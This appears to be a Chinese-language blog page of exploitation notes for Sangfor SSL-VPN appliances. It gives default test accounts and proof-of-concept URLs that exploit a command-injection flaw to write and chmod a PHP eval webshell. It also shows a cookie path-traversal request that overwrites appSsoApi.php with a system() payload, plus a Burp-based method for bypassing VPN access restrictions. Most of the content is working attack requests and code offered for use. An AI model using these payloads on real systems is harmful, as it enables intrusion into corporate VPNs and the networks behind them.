[TOC]
0x00 Sangfor AF
0x01 SangforSSL-VPN
(1)-OpenSSL心脏出血漏洞 (较少)
(2)-远程代码执行(Version <= M5.6)
(3)-Getshell漏洞(邮件服务器配置)
(4)-权限绕过
SSL-VPN版本查看: WeiyiGeek.SSL-VPN版本1
2
3
4POST /por/login_auth.csp?type=cs&cli=ssl&language=zh_CN&rnd=26471778&encrypt=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: SangforCS
Host: 183.230.46.100:4433
1.常见利用
默认测试账户:test、Guest
2.远程代码执行
影响范围:深信服版本 Version <= M5.6
缺陷代码: WeiyiGeek.远程代码执行1
2
3
4
5
6
//php exec函数
$args = $_REQUEST['cmd'];
/*something here*/
exec("tsutil -proxy $ip $args", $output, $ret);
利用POC:1
2
3
4
5
6
7
8
9curl http://**.**.**.**:1000/cgi-bin/php-cgi/html/svpn.php -d 'cmd=phpinfo();
/cgi-bin/php-cgi/html/svpnphp/_inc/commondef.php?-dallow_url_include=On -dauto_prepend_file=http://
#有 php-cgi 代码远程执行漏洞
http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php
//修改了
http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||chmod 777 /app/usr/sbin/webui/html/svpn.php
3.Getshell漏洞(邮件服务器配置)
漏洞利用前提:
- 有登陆SSL VPN控制台的权限
- 可以SSL VPN修改邮件服务器配置
缺陷代码文件:sysCfgController.class.php 147行 [邮件服务器设置的发送测试邮件功能]1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40public function sendTestMail($SMTPServer, $SMTPPort, $DestAddr, $EmailTitle, $EnableCheckUsr=0, $EmailUser='', $EmailPassword='',$EmailFrom='',$LanguageType='zh_CN')
{
// 写入临时配置文件
$conf_file = '/tmp/testmail_'.$_COOKIE['sinfor_session_id'];
$contents = "[MAIL]\n";
$contents .= "EnableEmailNotice = \"1\"\n";
$contents .= "SMTPServer = \"$SMTPServer\"\n";
$contents .= "SMTPPort = \"$SMTPPort\"\n";
$contents .= "EnableCheckUsr = \"$EnableCheckUsr\"\n";
$contents .= "EmailUser = \"$EmailUser\"\n";
$contents .= "EmailPassword = \"$EmailPassword\"\n";
$contents .= "EmailFrom = \"$EmailFrom\"\n";
$contents .= "DestAddr = \"$DestAddr\"\n";
$contents .= "EmailTitle = \"$EmailTitle\"\n";
$contents .= "ContentsFile = \"/tmp/smtpsend_test.txt\"\n";
@file_put_contents($conf_file, $contents); #file_put_contents在file_exists前执行,而$conf_file来源于cookie参数sinfor_session_id
if (!file_exists($conf_file))
throw new FileException($conf_file);
#修改cookie sinfor_session_id为:
sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/1.txt #即可在/tmp/目录下创建一个1.txt文件
#Getshell向web根目录下写个php就行,新建的文件权限是-rw-------,也就是说WEB容器不能执行新建的文件
#为了突破这个问题,需要覆盖掉一个已存在的php文件,利用其x权限来达到getshell的目的;
EG:/app/usr/sbin/webui/html/appSsoApi.php
#将Cookies修改
sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php
#验证请求
POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=SysCfg&action=sendTestMail&token=72c791a93959bf388db3af864c09bbee82f2d1a8 HTTP/1.1
Referer: https://***/html/tpl/mailMgt.html
Cookie: language=zh_CN; USER_CUSTOM_SETTING=1460011919; SESSID=C42EC5FBB05DCD23B13A3384C98E065DC8271CA9AC1B4F433557BC8C4FBC312; x-anti-csrf-
gcs=72DFC30A00E3FB9E; sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php;
PHPSESSID=870a66816ba987171730e9b80753da82; x-act-flag-gcs=; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%2238%22%2C%22recflag%22%3A0%2C
%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag
%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C
%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D
#下面是POC将下面的字符串写入了appSsoApi.php文件中
SMTPServer=1&EmailUser=&EmailPassword=&EmailFrom=1&LanguageType=zh_CN&DestAddr=1&EmailTitle=1 system(id); &SMTPPort=
4.权限绕过
描述:绕过深信服SSL VPN访问权限控制利用burp,在SSL VPN链接服务端后会下发一个资源表给客户端; WeiyiGeek.SSLVPN
图中的host字段就是VPN远端的服务器IP,port就是允许你访问的服务区端口号为22 (只允许你去访问10.x.x.x的22端口)
注意事项:可以修改服务器返回的IP和端口号(通过burp代理修改port范围为1-65535)来访问其它VPN远端资源,但是使用http代理后就不能访问L3VPN资源了L3VPN=TCP+UDP+ICMP WeiyiGeek.
解决方法:使用burp的invisible proxying WeiyiGeek.透明代理
所谓的invisible proxying就是透明代理,通过出口设备将访问VPN的数据重定向给burp即可;
Q :找谁重定向?
出口设备或者linux的iptables都可以,这里以出口设备DNAT为例
访问VPN的数据流变成如下流程:
hacker –> 出口 –> DNAT给burp(同时源IP转换为...) –> burp处理 –> 出口 –> VPN设备
注意:burp和hacker主机不能为同一台,为同一台的话会出现数据环路
1 | 这里做实验的hacker机IP为**.**.**.**,burp主机**.**.**.**,网关为**.**.**.**,VPN设备IP假设为**.**.**.** |

WeiyiGeek.Resolution
登陆SSL试下发现burp正常工作,VPN登陆流程比较慢但可以登陆,可以看到端口范围已经被burp自动修改了 WeiyiGeek.
注:这里VPN登陆成功后需取消网关的DNAT策略,否则会因burp代理速度太慢导致VPN不可用;